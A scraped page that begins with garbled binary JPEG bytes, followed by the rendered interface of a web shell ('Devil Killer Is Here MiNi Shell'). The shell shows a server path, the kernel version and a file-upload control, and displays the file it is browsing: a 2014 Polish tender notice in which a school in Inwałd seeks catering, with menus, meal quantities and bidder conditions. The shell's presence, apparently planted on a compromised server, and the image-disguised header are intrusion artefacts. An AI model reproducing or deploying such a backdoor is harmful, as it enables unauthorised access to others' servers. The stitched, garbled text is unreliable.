JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141124/243505-N-2014.html

<p class="kh_header"><b>Inwałd: Świadczenie usług cateringowych 
dla Zespołu Szkół Samorządowych w Inwałdzie</b><br>
<b>Numer ogłoszenia: 243505 - 2014; data zamieszczenia: 24.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Samorządowych w Inwałdzie , ul. Wadowicka 79, 34-120 Inwałd, woj. małopolskie, tel. 0-33 875 13 22, faks 0-33 875 13 22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych 
dla Zespołu Szkół Samorządowych w Inwałdzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Świadczenie usług cateringowych (zupy oraz drugiego dania obiadowego wraz z kompotem)                       dla stołówki Zespołu Szkół Samorządowych w Inwałdzie  oraz ( zupy i drugiego dania obiadowego wraz z kompotem) dla dzieci 3-6 letnich Przedszkola w Zespole Szkół Samorządowych w  Inwałdzie 

Wykaz  zestawów zup dla Przedszkola :

Zestaw 1:
Zupa ziemniaczana na zasmażce z kiełbasą - 300 ml
Zupa  pomidorowa  z  makaronem - świderki -   300  ml 
Barszcz czerwony zabielany z ziemniakami  - 300 ml
Zupa koperkowa z ryżem - 300 ml
Zupa grysikowa z warzywami - 300 ml

Zestaw 2:
Zupa jarzynowa z ziemniakami - 300 ml
Zupa kalafiorowa z ziemniakami  -  300 ml.
Zupa grochowa z ziemniakami - 300 ml
Rosół z makaronem - 300 ml
Zupa jarzynowa z makaronem - 300 ml

Zestaw 3:
Żurek z ziemniakami i jajkiem - 300 ml
Rosół z lanym ciastem - 300 ml
Zupa ogórkowa z ryżem - 300 ml
Zupa pomidorowa z makaronem - 300 ml
Zupa pieczarkowa   z makaronem -    300  ml

Zestaw 4 :
Zupa gulaszowa z ziemniakami - 300 ml
Rosół z makaronem -300 ml
Zupa ziemniaczana na zasmażce z kiełbasą -300 ml
Krupnik zabielany z ziemniakami - 300 ml
Zupa jarzynowa z ziemniakami - 300 ml

Zestaw 5 :
Barszcz ukraiński z kiełbasą - 300 ml
Zupa grysikowa - 300 ml
Barszcz czerwony zabielany z ziemniakami i kiełbasą - 300 ml
Zupa ogórkowa z ryżem - 300 ml
Zupa pomidorowa z makaronem - 300 ml

Wykaz zestawów w ramach drugiego dania obiadowego wraz z kompotem dla Przedszkola

ZESTAW I: Naleśniki z dżemem truskawkowym 200 g + kompot 150 ml

ZESTAW II: Kotlet schabowy panierowany 70 g + ziemniaki  150 g + kapusta biała zasmażana                100 g + kompot 150 ml

ZESTAW III: Krokiety z mięsem 300 g + kompot 150 ml
 
ZESTAW IV: Kotlet mielony 70g + ziemniaki  150 g + buraki z chrzanem 100g + kompot 150 ml

ZESTAW V: 	Kotlety ziemniaczany  200 g + sos pieczarkowy 30 g + surówka z kapusty kiszonej     100 g + kompot 150 ml

ZESTAW VI: Pierogi z mięsem 200 g + tłuszcz 10 g + cebulka 10 g + kompot 150 ml

ZESTAW VII: Gulasz  wieprzowy 100g + kasza 45 g + ogórek kiszony 100g + kompot 150 ml

ZESTAW VIII: Pierogi leniwe 200g + masło 10g + cukier 10g + kompot 150 ml

ZESTAW IX: Pieczeń wieprzowa 70 g + kluski śląskie 150 g + sałatka z kapusty czerwonej 100 g                  + kompot 150 ml

ZESTAW X: Kotlet mielony rybny 70 g + ziemniaki 150 g + surówka z kapusty kiszonej 100 g                     + kompot 150 ml

ZESTAW XI: Makaron pene z sosem alla  bolonez  i serem 200 g + kompot 150 ml

ZESTAW XII: Chikeny z kurczaka 70g + ziemniaki 150g + surówka marchwi i jabłka 100g                          + kompot 150 ml. 

ZESTAW XIII: Pulpety w sosie koperkowym 80g + ziemniaki 150g + buraki 100g                                         + kompot 150 ml.

ZESTAW XIV: Kotlet z kurczaka 70g + ziemniaki 150 g + surówka z kapusty pekińskiej 100g                       + kompot 150 ml

ZESTAW XV: Filet z dorsza 70g + ziemniaki 150g + surówka z kapusty kiszonej 100g                                       + kompot 150ml.

ZESTAW XVI: Gulasz  100g + kluski śląskie 150g + sałatka z czerwonej kapusty 100g                                         + kompot 150 ml.

ZESTAW XVII: Ryż na sypko 45g  +  polewa truskawkowa 30g + kompot truskawkowy 150 ml

ZESTAW XVIII: Chikeny z kurczaka 70g + ziemniaki 150g + surówka marchwi i jabłka 100g                          + kompot 150 ml

ZESTAW XIX: Kluski na parze 200g + polewa truskawkowa 30g + kompot 150 ml

ZESTAW XIX: Filet z dorsza 70 g + ziemniaki 150 g + kapusta zasmażana 100 g + kompot 150 ml

ZESTAW XX: Pierogi ruskie 200 g + kompot 150 ml

ZESTAW XXI: Kurczak gotowany panierowany 70 g + ziemniaki 150 g + kapusta kiszona zasmażana 100 g  + kompot 150 ml

ZESTAW XXII: Gołąbki bez zawijania300 g   + sos pomidorowy 20 g + kompot 200 ml  

ZESTAW XXIII: Pieczeń z indyka w sosie śmietankowym 80g + ziemniaki 150g + ogórek kiszony 100g + kompot 150 ml.
ZESTAW XXIV: Pierogi truskawkowe 200g + masło 10g + cukier 10g + kompot 150 ml

ZESTAW XXV: Pierogi Z serem białym 200g + masło 10g + cukier 10g + kompot 150 ml

ZESTAW XXVI: Befsztyk w sosie własnym 70 g + ziemniaki 150 g + sałatka z kapusty kiszonej         100 g + kompot 150 ml

ZESTAW XXVII: Krokiety z kapustą i pieczarkami 300 g + kompot 150 ml

ZESTAW XXVIII: Kotlet mielony drobiowy ( pożarski) 70 g + ziemniaki 150 g + buraki 100 g                       + kompot 150 ml

ZESTAW XXIX: Jajko gotowane - 1 szt. + sos koperkowy 20 g + ziemniaki 150 g                                        + sałatka szwedzka 100 g + kompot 150 ml

Wykaz  zestawów  zup dla stołówki  szkolnej  : 

Zestaw 1:
Rosół  z  makaronem   -  350  ml
Zupa  ogórkowa  z  ryżem   -  350  ml
Żurek z ziemniakami i białą kiełbasą  -   350  ml
Zupa jarzynowa z ziemn9iakami - 350 ml
Zupa pomidorowa z grubym makaronem - 350 ml

Zestaw 2:
Zupa grysikowa na rosole - 350 ml
Krupnik zabielany z ziemniakami - 350 ml
Barszcz biały z ziemniakami i jakiem - 350 ml
Zupa koperkowa z tartym ciastem - 350 ml
Zupa z grochu omielanego z grzankami - 350 ml

Zestaw 3:
Zupa kalafiorowa z ziemniakami  - 350 ml
Barszcz czerwony z ziemniakami i jajkiem - 350 ml
Zupa grzybowa z lanym ciastem - 350 ml
Kluski grysikowe na rosole - 350 ml
Kapuśniak z kiszonej kapusty z ziemniakami - 350 ml

Zestaw 4:
Fasolka po bretońsku -350 ml
Zupa ziemniaczana na zasmażce z kiełbasą - 350 ml
Zupa gulaszowa - 350 ml
Barszcz ukraiński z kiełbasą - 350 ml
Krupnik na zasmażce z ziemniakami - 350 ml

Wykaz zestawów w ramach drugiego dania obiadowego wraz z kompotem dla stołówki szkolnej 

ZESTAW I: Kotlet mielony 100g + ziemniaki 220g + buraczki czerwone 170 g 
+   kompot 200ml 

ZESTAW II: Pieczeń z indyka w sosie śmietankowym 100 g + ziemniaki 220 g + ogórek kiszony 170 g + kompot  200 ml

ZESTAW III: Pulpety drobiowe w sosie pieczarkowym 100 g + ziemniaki 220 g + sałatka szwedzka 170 g + kompot 200 ml

ZESTAW IV : Makaron pene z sosem alla  bolonez  i serem 400 g + kompot 200 ml

ZESTAW  V  :  Filet z dorsza 100 g + ziemniaki 220 g + surówka z kapusty pwekińskiej  170 g                    + kompot 200 ml

ZESTAW VI : Kotlet dewolay 100g + ziemniaki 220g + sałatka wielowarzywna 170 g 
+   kompot 200ml 

ZESTAW VII : Gołąbki w sosie pomidorowym 400 g   + kompot 200 ml  

ZESTAW VIII : Bitki wieprzowe 100 g + kasza jęczmienna 220 g + ogórek kiszony 170 g                               + kompot 200 ml

ZESTAW IX  : Kotlet ziemniaczany w sosie pieczarkowym 300 g + surówka z kiszonej kapusty                   170 g + kompot 200 ml

ZESTAW X  : Makaron świderki z białym serem i polewą truskawkową - 400 g + kompot 200 ml  

ZESTAW XI: Kotlet drobiowy 100 g + ziemniaki 220 g + buraczki czerwone (mielone) 170 g 
+ kompot 200 ml

ZESTAW XII: pieczeń wieprzowa 100 g + kluski śląskie 220 g + kapusta czerwona 170 g 
+ kompot 200 ml 

ZESTAW XIII  : Zrazy z boczkiem i marchewką 100 g + ziemniaki 220 g + bukiet jarzyn 170 g 
+ kompot 200 ml

ZESTAW XIV: Udko z kurczaka 100 g + ziemniaki 220 g + surówka z kapusty pekińskiej z sosem vinegret 170 g + kompot 200 ml

ZESTAW  XV :  Naleśniki  z  serem   i  dżemem  truskawkowym   400 g  +  kompot   200 ml. 

ZESTAW XVI : Klopsy w sosie własnym 100 g + ziemniaki 220 g + surówka z marchwi, jabłka                    i selera 170 g + kompot 200 ml

ZESTAW XVII : kotlet  schabowy  100 g. +  ziemniaki  220 g. +  kapusta zasmażana   170  g
+ kompot  200 ml. 

ZESTAW XVIII : filet z  kurczaka  w płatkach 100 g + ziemniaki 220 g + sałatka szwedzka  170 g 
+ kompot 200ml

ZESTAW XIX : panierowane podudzie 100 g + ziemniaki 220 g + marchewka z groszkiem 170 g                   + kompot 200 ml

ZESTAW XX : Makaron z sosem Napoli i serem 400 g + kompot 200 ml

ZESTWA XXI: Krokiety z mięsem 400 g + kompot 200 ml

ZESTAW XXII: Kotlet mielony drobiowy 100 g + ziemniaki 220 g + buraczki z chrzanem 170 g                      + kompot 200 ml
           

Wykonawca będzie dostarczał posiłki dla  szkoły  w poszczególnych dniach żywienia zgodnie                         z kolejnością zestawów zup oraz zestawów drugiego dania obiadowego oraz zestawów dla Przedszkola z pkt I niniejszej SIWZ. W przypadku większej liczby dni żywienia w danym miesiącu wydawane będą kolejne zestawy obiadowe poczynając od pierwszego w wykazie. Raz w tygodniu (piątek) serwowana jest potrawa bezmięsna. Zamawiający zastrzega możliwość korekty jadłospisu za zgodą Wykonawcy. 
A)Zamawiający planuje, że:
- dziennie do  Szkoły   należy dostarczyć 90 obiadów( drugie danie obiadowe wraz z kompotem ) oraz 40 zup. Do końca roku 2015 należy dostarczyć 16740  obiadów( drugie danie obiadowe wraz                            z kompotem )tj.  90   obiadów  x  186  dni , oraz  7440 zup tj. 40 zup    x 186 dni,
- dziennie do  Przedszkola  należy dostarczyć  25 obiadów(drugie danie obiadowe wraz z kompotem ),                 oraz  25 zup . Do  końca roku 2015 należy dostarczyć 5250  zestawów   tj. 25 obiadów x 210 dni                     i  25 zup  x 210  dni .

Miesiąc dostawy	Ilość dni usługi 
- stołówka szkolna	Ilość dni usługi
- Przedszkole
Styczeń	19	20
Luty	10	20
Marzec	22	22
Kwiecień	18	21
Maj	20	20
Czerwiec	17	21
Wrzesień	21	22
Październik	22	22
Listopad	20	20
Grudzień	17	22



B) Zamawiający zastrzega, że liczba posiłków jest zmienna. 
Zamawiający danego dnia do godz. 9.00 poinformuje Wykonawcę o ilości dostarczanych posiłków. Ilość posiłków będzie się zmieniać w zależności od frekwencji dzieci. Wykonawca nie może mieć                     w stosunku do Zamawiającego żadnych roszczeń z powodu realizacji umowy w mniejszym zakresie.

C) Wszystkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami                               i przepisami prawa. 

- Wykonawca będzie przygotowywał posiłki zgodnie z zasadami określonymi w ustawie                                  o bezpieczeństwie żywności i żywienia (Dz. U. z 2010r. nr 21 poz. 105 z późn. zm. ) łącznie                          z przepisami wykonawczymi do tej ustawy.

- Jadłospis układany będzie przez Wykonawcę (zaleca się różnorodność i niepowtarzalność dziennych zestawów żywieniowych).

 - Bezwzględnie należy przestrzegać norm na składniki pokarmowe i produkty spożywcze określone przez Instytut Żywienia i Żywności. Posiłki mają być przygotowane zgodnie z zasadami racjonalnego żywienia dzieci i młodzieży. 

- Wykonawca będzie przygotowywał posiłki w obiektach lub obiekcie, dla którego Wykonawca posiada decyzję Inspektora Sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków dla potrzeb zbiorowego żywienia dzieci oraz dostarczał posiłki zachowując wymogi sanitarno- epidemiologiczne w zakresie personelu i warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie. 

- Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP. Obowiązkiem Wykonawcy jest przechowywanie próbek pokarmowych ze wszystkich przygotowanych                                 i dostarczonych posiłków, każdego dnia przez okres 72 godzin z oznaczeniem daty, godziny, zawartości próbki pokarmowej, z podpisem osoby odpowiedzialnej za pobieranie tych próbek.                                       Za dokumentację z zakresu dobrej praktyki higienicznej i elementy systemu HACCP lub systemu równoważnego dostosowane do warunków cateringowych odpowiada Wykonawca.
Zamawiający zastrzega sobie prawo bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i jakości wykonywanych usług. 

D) Wykonawca odpowiada za transport przedmiotu zamówienia zgodnie z wymaganiami sanitarnymi dotyczącymi żywności. 

- Transport posiłków powinien odbywać się w pojemnikach transportowych - termosach wykonanych             z polipropylenu z podwójnymi ściankami izolującymi zapewniających właściwą ochronę                                    i temperaturę oraz jakość przewożonych potraw środkami transportu przystosowanymi do przewozu żywności. 

- Dostarczenie posiłków z miejsca produkcji do pomieszczenia dystrybucji w szkole realizowane będzie przez Wykonawcę na jego koszt.

- Wykonawca dostarczy szczelne pojemniki na odpady żywnościowe. Po spożyciu posiłków Wykonawca usunie tego samego dnia z terenu szkoły wszelkie odpady żywnościowe na swój koszt. 

- Koszty związane z myciem zastawy obiadowej, sprzątaniem kuchni ponosić będzie Zamawiający.

- Wykonawca  przyuczy  na  swój  koszt obsługę  stołówki Zamawiającego  do  wydawania  posiłków ( porcjowanie  posiłków )  przez  pierwszy  tydzień  żywienia .


E) Koszty związane z myciem termosów - pojemników transportowych ponosić będzie                  Wykonawca i zobowiązuje się do ich mycia w swojej siedzibie. Koszty te są ujęte przez Wykonawcę   w cenie obiadu.

F) Posiłki dla Szkoły Podstawowej i Gimnazjum będą wydawane na zastawie obiadowej                     (110 sztuk dużych talerzy i 50 talerzy  głębokich    na  zupy,  sztućce: widelce, noże po - 110  szt. oraz łyżki 50 sztuk)- użyczonej nieodpłatnie Zamawiającemu przez Wykonawcę na okres obowiązywania umowy. 

G) Posiłki dla Przedszkola będą wydawane na zastawie obiadowej (25 sztuk dużych talerzy                       i 25 miseczek  na  zupy,  sztućce: widelce, noże po - 25  szt. oraz łyżki 25 sztuk, )- użyczonej nieodpłatnie Zamawiającemu przez Wykonawcę na okres obowiązywania umowy. 

-Ponadto w  razie awarii Wykonawca użyczy nieodpłatnie zmywarki Zamawiającemu.  Wykonawca użyczy także  nieodpłatnie Zamawiającemu: dwukomorowy podgrzewacz                         (z niezależną regulacją temperatur na każdą komorę wraz z piekarnikiem do pojemników transportowych z posiłkami-1 szt., zamawiający będzie wydawał obiady na kilku przerwach międzylekcyjnych )    oraz  lodówkę - 1 szt. , na okres obowiązywania umowy.
 

- Zamawiający nie ponosi odpowiedzialności finansowej za zniszczenie i uszkodzenie  termosów  pojemników i  podgrzewaczy  z przyczyn niezależnych od Zamawiającego oraz za stłuczenie                  w trakcie użytkowania 10% zastawy użyczonej przez Wykonawcę. 

- Braki w zastawie powyżej 10% uzupełni Zamawiający na swój koszt. 

H) Wykonawca gwarantuje, że usługi świadczone będą na najwyższym poziomie, a mianowicie:

Dostarczone posiłki muszą być świeże i winny być przyrządzone w dniu dostawy.

I) Wykonawca zobowiązuje się do terminowego dostarczania posiłków w okresie od 05.01.2015 r. do 22.12.2015 r. w dniach pracy szkoły z wyłączeniem: ferii zimowych i letnich, dni świątecznych, ustawowo i dodatkowo wolnych dni od zajęć dydaktyczno - wychowawczych, w stałych godzinach przerwy międzylekcyjnej od godz. 10.50 do godz. 11.00  wraz z wniesieniem do stołówki szkolnej.

J) Wykonawca zobowiązuje się do terminowego dostarczania  i wydawania posiłków dla Przedszkola w okresie od 02.01.2015 r. do 31.12.2015 r. w dniach pracy przedszkola  z wyłączeniem: ferii letnich, dni świątecznych, ustawowo i dodatkowo wolnych dni od zajęć dydaktyczno - wychowawczych, w stałych godzinach: od 10.50-11.00 wraz z wniesieniem do sali Przedszkola.

W przypadku awarii lub innych nie przewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o niezgorszej jakości na swój koszt z innych źródeł. 

K) Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach rozliczeniowych na podstawie ilości dostarczonych posiłków przez Wykonawcę i płatne na rachunek Wykonawcy w terminie 14 dni licząc od dnia otrzymania przez Zamawiającego prawidłowej pod  względem formalnym i rachunkowym faktury VAT. Do faktury należy dołączyć wartości kaloryczne oraz normy dostarczonych posiłków.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości  do 50 % wartości zamówienia podstawowego zgodnie z art. 67 ust.1 pkt.6  ust. Prawo Zamówień Publicznych .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
a)	 złoży oświadczenie o spełnianiu warunków - na formularzu wg wzoru jak w załączniku                   nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
A.	wykaże (na formularzu wg wzoru jak w załączniku nr 3 do SIWZ), że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną usługę cateringową (przygotowywanie i transport ciepłego posiłku) trwającą co najmniej dwanaście miesięcy dla minimum  30 dzieci przedszkolnych lub  młodzieży szkolnej. W przypadku wykonywania i nie zakończenia jeszcze usługi Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełniania warunku. Fakt wykonania takiej usługi musi być potwierdzony dokumentem, że usługa została wykonana należycie lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
złoży oświadczenie o spełnianiu  warunków - na formularzu wg wzoru jak w załączniku 
nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
złoży oświadczenie o spełnianiu  warunków - na formularzu wg wzoru jak w załączniku 
nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
1.	wykaże się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej                    w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200 000,00 zł. brutto  (w  przypadku braku potwierdzenia w treści polisy opłaty należy załączyć dokumenty, które będą ten fakt potwierdzać).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
